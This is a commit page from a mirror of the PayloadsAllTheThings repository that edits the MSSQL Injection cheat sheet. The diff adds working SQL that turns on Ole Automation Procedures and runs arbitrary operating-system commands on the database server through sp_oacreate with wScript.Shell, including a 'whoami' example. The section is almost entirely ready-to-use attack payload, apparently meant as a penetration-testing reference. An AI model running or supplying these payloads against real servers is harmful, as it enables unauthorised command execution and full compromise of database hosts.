Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2026-05-07 12:07:37 +02:00
Code Issues Projects Releases Wiki Activity

added ole automation command execution

Browse source
This commit is contained in:
f0rk3b0mb 2026-04-28 11:51:38 +03:00
parent 40639cf2e4
commit 981a76f2fd
1 changed files with 7 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
SQL Injection/MSSQL Injection.md
View file

@ -300,26 +300,26 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open
`Object Linking and Embedding (OLE)` is a technology that allows one application to link objects into another application. It was originally designed for Microsoft Office (e.g. to embed Excel sheets into Word documents) and eventually became the foundation for the Component Object Model (COM). OLE Automation enables a SQL server to interact with arbitrary COM objects.
```
> Check current status
```sql
-- Check current status
EXEC sp_configure 'Ole Automation Procedures';
> Enable OLE Automation
-- Enable OLE Automation
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
> Verify it's enabled
-- Verify it's enabled
EXEC sp_configure 'Ole Automation Procedures';
> run command
-- run command
DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("<command>")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output;
DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("whoami")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output;
>> NOTE that it does not print output (it is blind execution)
-- NOTE that it does not print output (it is blind execution)
```